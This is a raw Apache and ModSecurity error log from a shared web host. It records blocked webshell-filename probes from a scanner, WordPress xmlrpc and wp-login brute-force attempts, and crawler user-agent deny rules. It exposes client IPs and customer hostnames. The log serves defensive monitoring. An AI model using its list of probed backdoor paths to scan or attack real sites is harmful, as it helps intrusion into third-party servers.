[Tue May 26 17:27:01.292496 2026] [core:crit] [pid 882219:tid 882420] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:27:01.469118 2026] [security2:error] [pid 882219:tid 882357] [client 20.197.193.33:58396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahWKjZ8tTkZcqimiXcQLnQAAAI0"]
[Tue May 26 17:27:01.575200 2026] [security2:error] [pid 882219:tid 882437] [client 114.119.159.160:38115] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/website-design-development"] [unique_id "ahWKjZ8tTkZcqimiXcQLpAAAAN0"], referer: https://triviewsolutions.com/website-design-development
[Tue May 26 17:27:01.647488 2026] [security2:error] [pid 882219:tid 882378] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKjZ8tTkZcqimiXcQLpgAAAKI"]
[Tue May 26 17:27:01.825987 2026] [security2:error] [pid 882219:tid 882410] [client 20.197.193.33:58396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWKjZ8tTkZcqimiXcQLqwAAAMI"]
[Tue May 26 17:27:02.006632 2026] [security2:error] [pid 882219:tid 882385] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKjp8tTkZcqimiXcQLtgAAAKk"]
[Tue May 26 17:27:02.201191 2026] [security2:error] [pid 882219:tid 882367] [client 20.197.193.33:58396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWKjp8tTkZcqimiXcQLugAAAJc"]
[Tue May 26 17:27:02.201299 2026] [security2:error] [pid 882219:tid 882367] [client 20.197.193.33:58396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWKjp8tTkZcqimiXcQLugAAAJc"]
[Tue May 26 17:27:02.637548 2026] [security2:error] [pid 882219:tid 882462] [client 20.197.193.33:58394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWKjp8tTkZcqimiXcQLxgAAAPY"]
[Tue May 26 17:27:02.637658 2026] [security2:error] [pid 882219:tid 882462] [client 20.197.193.33:58394] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWKjp8tTkZcqimiXcQLxgAAAPY"]
[Tue May 26 17:27:03.066876 2026] [security2:error] [pid 882219:tid 882369] [client 223.235.98.214:7584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKj58tTkZcqimiXcQL1wAAAJk"]
[Tue May 26 17:27:03.067609 2026] [security2:error] [pid 882219:tid 882369] [client 223.235.98.214:7584] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKj58tTkZcqimiXcQL1wAAAJk"]
[Tue May 26 17:27:03.247825 2026] [security2:error] [pid 882219:tid 882357] [client 20.197.193.33:58462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWKj58tTkZcqimiXcQL3gAAAI0"]
[Tue May 26 17:27:03.247947 2026] [security2:error] [pid 882219:tid 882357] [client 20.197.193.33:58462] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWKj58tTkZcqimiXcQL3gAAAI0"]
[Tue May 26 17:27:03.289196 2026] [security2:error] [pid 882219:tid 882415] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKjp8tTkZcqimiXcQL0AAAAMc"]
[Tue May 26 17:27:03.808152 2026] [security2:error] [pid 882219:tid 882441] [client 20.197.193.33:58389] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWKj58tTkZcqimiXcQL9AAAAOE"]
[Tue May 26 17:27:03.808257 2026] [security2:error] [pid 882219:tid 882441] [client 20.197.193.33:58389] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWKj58tTkZcqimiXcQL9AAAAOE"]
[Tue May 26 17:27:04.216069 2026] [security2:error] [pid 882219:tid 882422] [client 20.197.193.33:58452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWKkJ8tTkZcqimiXcQL_gAAAM4"]
[Tue May 26 17:27:04.216174 2026] [security2:error] [pid 882219:tid 882422] [client 20.197.193.33:58452] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahWKkJ8tTkZcqimiXcQL_gAAAM4"]
[Tue May 26 17:27:04.864039 2026] [security2:error] [pid 882219:tid 882355] [client 20.197.193.33:58324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/details/"] [unique_id "ahWKkJ8tTkZcqimiXcQMHAAAAIs"]
[Tue May 26 17:27:04.887217 2026] [security2:error] [pid 882219:tid 882398] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKkJ8tTkZcqimiXcQMDAAAALY"]
[Tue May 26 17:27:05.043425 2026] [security2:error] [pid 882219:tid 882394] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKkZ8tTkZcqimiXcQMJgAAALI"]
[Tue May 26 17:27:05.051026 2026] [security2:error] [pid 882219:tid 882285] [remote 103.91.67.202:46906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKkJ8tTkZcqimiXcQMGwAAvUE"]
[Tue May 26 17:27:05.226588 2026] [security2:error] [pid 882219:tid 882465] [client 20.197.193.33:58324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahWKkZ8tTkZcqimiXcQMNQAAAPk"]
[Tue May 26 17:27:05.405938 2026] [security2:error] [pid 882219:tid 882410] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKkZ8tTkZcqimiXcQMOQAAAMI"]
[Tue May 26 17:27:05.603579 2026] [security2:error] [pid 882219:tid 882406] [client 20.197.193.33:58324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWKkZ8tTkZcqimiXcQMRgAAAL4"]
[Tue May 26 17:27:05.603691 2026] [security2:error] [pid 882219:tid 882406] [client 20.197.193.33:58324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahWKkZ8tTkZcqimiXcQMRgAAAL4"]
[Tue May 26 17:27:06.056300 2026] [security2:error] [pid 882219:tid 882415] [client 20.197.193.33:58477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWKkp8tTkZcqimiXcQMXgAAAMc"]
[Tue May 26 17:27:06.056407 2026] [security2:error] [pid 882219:tid 882415] [client 20.197.193.33:58477] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahWKkp8tTkZcqimiXcQMXgAAAMc"]
[Tue May 26 17:27:06.648508 2026] [security2:error] [pid 882219:tid 882449] [client 20.197.193.33:58484] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahWKkp8tTkZcqimiXcQMfQAAAOk"]
[Tue May 26 17:27:06.827216 2026] [security2:error] [pid 882219:tid 882389] [client 20.197.193.33:58457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWKkp8tTkZcqimiXcQMhwAAAK0"]
[Tue May 26 17:27:07.024763 2026] [security2:error] [pid 882219:tid 882476] [client 20.197.193.33:58484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWKk58tTkZcqimiXcQMjgAAAQQ"]
[Tue May 26 17:27:07.024863 2026] [security2:error] [pid 882219:tid 882476] [client 20.197.193.33:58484] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/xmu.php"] [unique_id "ahWKk58tTkZcqimiXcQMjgAAAQQ"]
[Tue May 26 17:27:07.542616 2026] [security2:error] [pid 882219:tid 882472] [client 20.197.193.33:58376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWKk58tTkZcqimiXcQMsQAAAQA"]
[Tue May 26 17:27:07.542762 2026] [security2:error] [pid 882219:tid 882472] [client 20.197.193.33:58376] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/mode.php"] [unique_id "ahWKk58tTkZcqimiXcQMsQAAAQA"]
[Tue May 26 17:27:07.788645 2026] [security2:error] [pid 882219:tid 882356] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKk58tTkZcqimiXcQMpgAAAIw"]
[Tue May 26 17:27:07.881242 2026] [security2:error] [pid 882219:tid 882466] [client 203.194.101.7:59893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKk58tTkZcqimiXcQMxQAAAPo"]
[Tue May 26 17:27:07.881354 2026] [security2:error] [pid 882219:tid 882466] [client 203.194.101.7:59893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKk58tTkZcqimiXcQMxQAAAPo"]
[Tue May 26 17:27:07.941743 2026] [security2:error] [pid 882219:tid 882375] [client 20.197.193.33:58330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWKk58tTkZcqimiXcQMyAAAAJ8"]
[Tue May 26 17:27:07.941828 2026] [security2:error] [pid 882219:tid 882375] [client 20.197.193.33:58330] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWKk58tTkZcqimiXcQMyAAAAJ8"]
[Tue May 26 17:27:10.175872 2026] [security2:error] [pid 882219:tid 882463] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKlZ8tTkZcqimiXcQNMAAAAPc"]
[Tue May 26 17:27:11.228687 2026] [security2:error] [pid 882219:tid 882471] [client 146.174.184.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKlp8tTkZcqimiXcQNWgAAAP8"]
[Tue May 26 17:27:12.710348 2026] [security2:error] [pid 882219:tid 882380] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKmJ8tTkZcqimiXcQNfwAAAKQ"]
[Tue May 26 17:27:13.164843 2026] [security2:error] [pid 882219:tid 882461] [client 185.191.171.17:37248] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWKmZ8tTkZcqimiXcQNkwAAAPU"]
[Tue May 26 17:27:13.165030 2026] [security2:error] [pid 882219:tid 882461] [client 185.191.171.17:37248] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWKmZ8tTkZcqimiXcQNkwAAAPU"]
[Tue May 26 17:27:13.871586 2026] [security2:error] [pid 882219:tid 882430] [client 223.235.98.214:12127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKmZ8tTkZcqimiXcQNowAAANY"]
[Tue May 26 17:27:13.871746 2026] [security2:error] [pid 882219:tid 882430] [client 223.235.98.214:12127] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKmZ8tTkZcqimiXcQNowAAANY"]
[Tue May 26 17:27:15.812226 2026] [security2:error] [pid 882219:tid 882389] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKm58tTkZcqimiXcQN6gAAAK0"]
[Tue May 26 17:27:16.871394 2026] [security2:error] [pid 882219:tid 882388] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKnJ8tTkZcqimiXcQOJAAAAKw"]
[Tue May 26 17:27:17.536518 2026] [security2:error] [pid 882219:tid 882393] [client 185.191.171.14:42972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWKnZ8tTkZcqimiXcQOaQAAALE"]
[Tue May 26 17:27:17.536641 2026] [security2:error] [pid 882219:tid 882393] [client 185.191.171.14:42972] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWKnZ8tTkZcqimiXcQOaQAAALE"]
[Tue May 26 17:27:18.189584 2026] [security2:error] [pid 882219:tid 882352] [client 203.194.101.7:60228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKnp8tTkZcqimiXcQOkQAAAIg"]
[Tue May 26 17:27:18.189748 2026] [security2:error] [pid 882219:tid 882352] [client 203.194.101.7:60228] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKnp8tTkZcqimiXcQOkQAAAIg"]
[Tue May 26 17:27:18.868443 2026] [security2:error] [pid 882219:tid 882295] [remote 216.73.216.30:15229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWKnp8tTkZcqimiXcQOuQAAuks"]
[Tue May 26 17:27:19.138444 2026] [security2:error] [pid 882219:tid 882417] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKnp8tTkZcqimiXcQOrwAAAMk"]
[Tue May 26 17:27:20.425089 2026] [security2:error] [pid 882219:tid 882350] [client 114.119.158.143:24317] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/siliconelevators-products.php"] [unique_id "ahWKoJ8tTkZcqimiXcQPCwAAAIY"], referer: https://www.siliconelevators.in/siliconelevators-about.php
[Tue May 26 17:27:21.629005 2026] [security2:error] [pid 882219:tid 882406] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKoZ8tTkZcqimiXcQPPAAAAL4"]
[Tue May 26 17:27:23.725286 2026] [security2:error] [pid 882219:tid 882408] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKo58tTkZcqimiXcQPpQAAAMA"]
[Tue May 26 17:27:24.541099 2026] [security2:error] [pid 882219:tid 882459] [client 223.235.98.214:2091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKpJ8tTkZcqimiXcQP8AAAAPM"]
[Tue May 26 17:27:24.541203 2026] [security2:error] [pid 882219:tid 882459] [client 223.235.98.214:2091] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKpJ8tTkZcqimiXcQP8AAAAPM"]
[Tue May 26 17:27:26.237472 2026] [security2:error] [pid 882219:tid 882395] [client 216.73.160.141:24765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 141.160.73.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWKpp8tTkZcqimiXcQQQwAAALM"]
